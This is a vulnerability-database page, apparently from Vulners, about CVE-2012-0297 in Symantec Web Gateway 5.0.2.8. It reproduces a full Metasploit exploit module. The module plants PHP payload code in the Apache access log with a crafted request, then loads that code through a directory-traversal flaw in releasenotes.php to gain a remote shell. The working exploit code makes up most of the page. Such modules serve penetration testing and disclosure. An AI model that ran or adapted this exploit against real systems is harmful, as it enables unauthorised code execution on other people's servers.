Lucene search
+L

Symantec Web Gateway 5.0.2.8 Command Execution

🗓️ 29 May 2012 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 24 Views

Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability allows remote code execution by injecting PHP code in the access log with a directory traversal flaw

Related
Code
ReporterTitlePublishedViews
Family
zdt
Symantec Web Gateway 5.0.2.8 Command Execution
28 May 201200:00
zdt
zdt
Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
12 Jun 201200:00
zdt
zdt
Symantec Web Gateway 5.0.2.8 Multiple Vulnerabilities
27 Jun 201200:00
zdt
attackerkb
CVE-2012-0297 Symantec Web Gateway Vulnerability
21 May 201200:00
attackerkb
circl
CVE-2012-0297
26 May 201200:00
circl
checkpoint_advisories
Symantec Web Gateway Management Console Remote Shell Command Execution (CVE-2012-0297)
16 Jul 201200:00
checkpoint_advisories
cve
CVE-2012-0297
21 May 201220:00
cve
cvelist
CVE-2012-0297
21 May 201220:00
cvelist
d2
DSquare Exploit Pack: D2SEC_SYMWEBGW
21 May 201220:55
d2
dsquare
Symantec Web Gateway 5.0.2 RCE
9 Jun 201200:00
dsquare
Rows per page

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Symantec Web Gateway's HTTP
        service.  By injecting PHP code in the access log, it is possible to load it
        with a directory traversal flaw, which allows remote code execution under the
        context of 'apache'. Please note that it may take up to several minutes to
        retrieve access_log, which is about the amount of time required to see a shell
        back.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', #Discovery
          'muts',    #PoC
          'sinn3r'   #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2012-0297'],
          ['EDB', '18932'],
          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions'  =>
        {
          'WfsDelay' => 300,  #5 minutes
          'DisablePayloadHandler' => 'false',
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Symantec Web Gateway 5.0.2.8', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 17 2012",
      'DefaultTarget'  => 0))
  end


  def check
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => '/spywall/login.php'
    })

    if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end


  def exploit
    peer = "#{rhost}:#{rport}"

    php = %Q|<?php #{payload.encoded} ?>|

    # Inject PHP to log
    print_status("#{peer} - Injecting PHP to log...")
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/#{php}"
    })

    select(nil, nil, nil, 1)

    # Use the directory traversal to load the PHP code
    # access_log takes a long time to retrieve
    print_status("#{peer} - Loading PHP code..")
    send_request_raw({
      'method' => 'GET',
      'uri'    => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log'
    })

    print_status("#{peer} - Waiting for a session, may take some time...")

    select(nil, nil, nil, 1)

    handler
  end
end
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation